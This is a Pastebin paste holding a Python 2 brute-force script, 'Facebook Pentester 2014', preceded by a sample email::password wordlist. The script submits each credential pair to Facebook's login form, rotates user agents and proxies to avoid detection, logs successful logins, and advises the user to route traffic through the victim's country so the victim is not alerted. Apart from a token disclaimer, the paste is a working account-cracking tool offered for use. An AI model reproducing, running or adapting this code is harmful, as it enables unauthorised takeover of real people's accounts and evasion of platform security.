SHARE
TWEET

Untitled

a guest Apr 11th, 2015 8,587 Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
  1. Target@facebook.com::password
  2. Target@facebook.com::12345
  3. Target@facebook.com::123456
  4. Target@facebook.com::1234567
  5. Target@facebook.com::pa$$w0rd
  6. Target@facebook.com::12345678
  7. Target@facebook.com::123456789
  8. Target@facebook.com::1216565
  9. Target@facebook.com::214548554
  10. Target@facebook.com::5463513
  11. Target@facebook.com::45453452
  12. !/usr/bin/python
  13. #Facebook Pentester 2014 can crack into Facebook Id's 100% without Interruption By Facebook Firewall !
  14. #This program is for sale & the objectif of this product is only for educational purposes only.
  15. #Changing Description of this Script won't make you the coder ^_^ !
  16. #Don't Crack people facebook account's it's illegal !
  17. #If you want to crack into someone's account, you must have the permission of the user.
  18. #Mauritania Attacker is not responsible.
  19.  
  20. import re
  21. import os
  22. import sys
  23. import random
  24. import warnings
  25. import time
  26. try:
  27.         import mechanize
  28. except ImportError:
  29.         print "[*] Please install mechanize python module first"
  30.         sys.exit(1)
  31. except KeyboardInterrupt:
  32.         print "\n[*] Exiting program...\n"
  33.         sys.exit(1)
  34. try:
  35.         import cookielib
  36. except ImportError:
  37.         print "[*] Please install cookielib python module first"
  38.         sys.exit(1)
  39. except KeyboardInterrupt:
  40.         print "\n[*] Exiting program...\n"
  41.         sys.exit(1)
  42.  
  43. warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
  44.  
  45. # define variable
  46. __Script__   = "Facebook Pentester 2014 Priv8888!"
  47. __Released__ = "27/01/2014 By Mauritania Attacker"
  48. __moi__  = "Facebook Checkpoint Security Bypassed 100%"
  49. verbose         = False
  50. useproxy        = False
  51. usepassproxy    = False
  52. log             = 'ghost.log'
  53. file            = open(log, "a")
  54. success         = 'home_edit_profile'
  55. checkpoint      = 'checkpoint'
  56. oldpass         = 'You entered an old password'
  57. fblogin         = 'https://login.facebook.com/login.php?login_attempt=1'
  58. # some priv8 useragents for Facebook Security !
  59. useragent    = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
  60.                 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
  61.                 'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
  62.                 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
  63.                 'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
  64.                 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
  65.                 'Microsoft Internet Explorer/4.0b1 (Windows 95)',
  66.                 'Opera/8.00 (Windows NT 5.1; U; en)',
  67.                 'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
  68.                 'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
  69.                 'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
  70.                 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
  71.                 'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
  72.                 'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
  73.                 ]
  74. facebook        = '''
  75.  
  76. #Facebook Pentester 2014 Priv8.
  77. #Coded By Mauritania Attacker.
  78. #Features: Verbose Method + Intrusion.
  79. #Details: Pentest Facebook Accounts + Anonymous Fast Proxy Undetectable.
  80.  
  81. Script : %s
  82. New Security Bypass : %s
  83. Released    : %s''' % (__Script__, __moi__, __Released__)
  84. option          = '''
  85. Usage  : %s -w pentest.txt
  86. Option : -w, --wordlist         <filename>      |   Wordlist used for Cracking
  87.          -v, --verbose                          |   Set %s will be verbose
  88.          -p, --proxy            <host:port>     |   Set http proxy will be use
  89.          -k, --usernameproxy    <username>      |   Set username at proxy will be use
  90.          -i, --passproxy        <password>      |   Set password at proxy will be use
  91.          -l, --log              <filename>      |   Specify output filename (default : ghost.log)
  92.          -h, --help             <help>          |   Print this help
  93.  
  94. Example : %s -w pentest.txt"
  95.  
  96. P.S : add "&" to run in the background
  97. ''' % (sys.argv[0], sys.argv[0], sys.argv[0])
  98. hme             = '''
  99. Usage : %s -w pentest.txt
  100.         -h or --help for get help
  101.         ''' % sys.argv[0]
  102.  
  103. def helpme():
  104.         print facebook
  105.         print option
  106.         file.write(facebook)
  107.         file.write(option)
  108.         sys.exit(1)
  109.  
  110. def helpmee():
  111.         print facebook
  112.         print hme
  113.         file.write(facebook)
  114.         file.write(hme)
  115.         sys.exit(1)
  116.  
  117. for arg in sys.argv:
  118.         try:
  119.                 if arg.lower() == '-u' or arg.lower() == '--user':
  120.                         username = sys.argv[int(sys.argv[1:].index(arg))+2]
  121.                 elif arg.lower() == '-w' or arg.lower() == '--wordlist':
  122.                         wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
  123.                 elif arg.lower() == '-l' or arg.lower() == '--log':
  124.                         log = sys.argv[int(sys.argv[1:].index(arg))+2]
  125.                 elif arg.lower() == '-p' or arg.lower() == '--proxy':
  126.                         useproxy = True
  127.                         proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
  128.                 elif arg.lower() == '-k' or arg.lower() == '--userproxy':
  129.                         usepassproxy = True
  130.                         usw = sys.argv[int(sys.argv[1:].index(arg))+2]
  131.                 elif arg.lower() == '-i' or arg.lower() == '--passproxy':
  132.                         usepassproxy = True
  133.                         usp = sys.argv[int(sys.argv[1:].index(arg))+2]
  134.                 elif arg.lower() == '-v' or arg.lower() == '--verbose':
  135.                         verbose = True
  136.                 elif arg.lower() == '-h' or arg.lower() == '--help':
  137.                         helpme()
  138.                 elif len(sys.argv) <= 1:
  139.                         helpmee()
  140.         except IOError:
  141.                 helpme()
  142.         except NameError:
  143.                 helpme()
  144.         except IndexError:
  145.                 helpme()
  146.  
  147. def bruteforce(word):
  148.         try:
  149.                 pos = word.find("::")
  150.                 userEmail = word[0:pos]
  151.                 word = word[pos+len("::"):len(word)]
  152.                
  153.                 print("userEmail: " + userEmail )
  154.                 print("password: " + word )
  155.                 file.write("[*] Trying " + userEmail + "::" + word + "\n" )
  156.                 sys.stdout.flush()
  157.                 rch = random.choice(useragent)
  158.                 br.addheaders = [('User-agent', rch)]
  159.                 # print("User Agent: " + rch )
  160.                 opensite = br.open(fblogin)
  161.  
  162.                 # To show and print all forms name
  163.                 # for form in br.forms():
  164.                 #      print "Form name:", form.name
  165.                 #      print form
  166.  
  167.                 # To show all control elements in the form
  168.                 # br.form = list(br.forms())[0]
  169.                 # for control in br.form.controls:
  170.                 #      print control
  171.                 #      print "type=%s, name=%s value=%s" % (control.type, control.name, br[control.name])
  172.  
  173.                 # To dump cookies data being sent and received
  174.                 # dump();
  175.  
  176.                 # Release email account from autotext fill
  177.                 # If email still auto-filled on login form, this script would not work as expected, so we need to release it
  178.  
  179.                 NotMe = "notme_cuid"
  180.                 for link in br.links():
  181.                         if (NotMe in link.url):
  182.                                 request = br.click_link(link)
  183.                                 response = br.follow_link(link)
  184.                                 # print response.geturl()
  185.  
  186.                 br.select_form(nr=0)
  187.  
  188.                 br.form = list(br.forms())[0]
  189.                 br.form['email'] = userEmail
  190.                 br.form['pass'] = word
  191.                 br.submit()
  192.                 response = br.response().read()
  193.  
  194.                 if verbose:
  195.                         print response
  196.                 if success in response:
  197.                         print "\n\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/"
  198.                         print "[*] userEmail : %s" % (userEmail)
  199.                         print "[*] Password : %s\n" % (word)
  200.                         file.write("\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/")
  201.                         file.write("\n[*] userEmail : %s" % (userEmail))
  202.                         file.write("\n[*] Password : %s\n\n" % (word))
  203.  
  204.                         # After the successful login, force to Logout (to clear the cookies & the session - Very important!)
  205.                         for form in br.forms():
  206.                                 if form.attrs['id'] == 'logout_form':
  207.                                         br.form = form
  208.                                         br.submit()
  209.                 elif checkpoint in response:
  210.                         print "\n\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/"
  211.                         print "[*] userEmail : %s" % (userEmail)
  212.                         print "[*] Password : %s\n" % (word)
  213.                         file.write("\n[*] You just Logged in successfully inside your victim Account Nygga xd...but Security checkpoint, so always use HTTPS Proxy of the country of your Victim or your victim will be Alerted \!/")
  214.                         file.write("\n[*] userEmail : %s" % (userEmail))
  215.                         file.write("\n[*] Password : %s\n\n" % (word))
  216.  
  217.                         # In checkpoint, this account maybe has been logged in, so we need to Log it Out after the successful login
  218.                         LogOut = "logout.php"
  219.                         for link in br.links():
  220.                                 if (LogOut in link.url):
  221.                                         request = br.click_link(link)
  222.                                         response = br.follow_link(link)
  223.                                         # print response.geturl()
  224.                                         # print "This account has been logged out"
  225.                                 # else:
  226.                                 #        print "Can not click Log Out link"
  227.                        
  228.         except KeyboardInterrupt:
  229.                 print "\n[*] Exiting program...\n"
  230.                 sys.exit(1)
  231.         except mechanize._mechanize.FormNotFoundError:
  232.                 print "\n[*] Form Not Found\n"
  233.                 file.write("\n[*] Form Not Found\n")
  234.                 sys.exit(1)
  235.         except mechanize._form.ControlNotFoundError:
  236.                 print "\n[*] Control Not Found\n"
  237.                 file.write("\n[*] Control Not Found\n")
  238.                 sys.exit(1)
  239.  
  240. # Priv8 Function to Dump Cookies Data
  241. # def dump():
  242. #       for cookie in cj:
  243. #               print cookie.name, cookie.value
  244.  
  245. def releaser():
  246.         global word
  247.         for word in words:
  248.                 bruteforce(word.replace("\n",""))
  249.  
  250. def main():
  251.         global br
  252.         global words
  253.         # Priv8 Function to enable dump()
  254.         # global cj
  255.         try:
  256.                 br = mechanize.Browser()
  257.                 cj = cookielib.LWPCookieJar()
  258.                 br.set_cookiejar(cj)
  259.                 br.set_handle_equiv(True)
  260.                 br.set_handle_gzip(True)
  261.                 br.set_handle_redirect(True)
  262.                 br.set_handle_referer(True)
  263.                 br.set_handle_robots(False)
  264.                 br.set_debug_http(False)
  265.                 br.set_debug_redirects(False)
  266.                 br.set_debug_redirects(False)
  267.                 br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
  268.                 if useproxy:
  269.                         br.set_proxies({"http": proxy})
  270.                 if usepassproxy:
  271.                         br.add_proxy_password(usw, usp)
  272.                 if verbose:
  273.                         br.set_debug_http(True)
  274.                         br.set_debug_redirects(True)
  275.                         br.set_debug_redirects(True)
  276.         except KeyboardInterrupt:
  277.                 print "\n[*] Exiting program...\n"
  278.                 file.write("\n[*] Exiting program...\n")
  279.                 sys.exit(1)
  280.         try:
  281.                 preventstrokes = open(wordlist, "r")
  282.                 words          = preventstrokes.readlines()
  283.                 count          = 0
  284.                 while count < len(words):
  285.                         words[count] = words[count].strip()
  286.                         count += 1
  287.         except IOError:
  288.                 print "\n[*] Error: Check your config path\n"
  289.                 file.write("\n[*] Error: Check your config path\n")
  290.                 sys.exit(1)
  291.         except NameError:
  292.                 helpme()
  293.         except KeyboardInterrupt:
  294.                 print "\n[*] Exiting program...\n"
  295.                 file.write("\n[*] Exiting program...\n")
  296.                 sys.exit(1)
  297.         try:
  298.                 print facebook
  299.                 print "\n[*] Starting Cracking at %s" % time.strftime("%X")
  300.                 #print "[*] Account To Crack %s" % (username)
  301.                 print "[*] Loaded :",len(words),"words"
  302.                 print "[*] Cracking, please wait..."
  303.                 file.write(facebook)
  304.                 file.write("\n[*] Starting Cracking at %s" % time.strftime("%X"))
  305.                 #file.write("\n[*] Account To Crack %s" % (username))
  306.                 file.write("\n[*] Loaded : %d words" % int(len(words)))
  307.                 file.write("\n[*] Cracking, please wait...\n")
  308.         except KeyboardInterrupt:
  309.                 print "\n[*] Script Closed...\n"
  310.                 sys.exit(1)
  311.         try:
  312.                 releaser()
  313.                 bruteforce(word)
  314.         except NameError:
  315.                 helpme()
  316.  
  317. if __name__ == '__main__':
  318.         main()
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top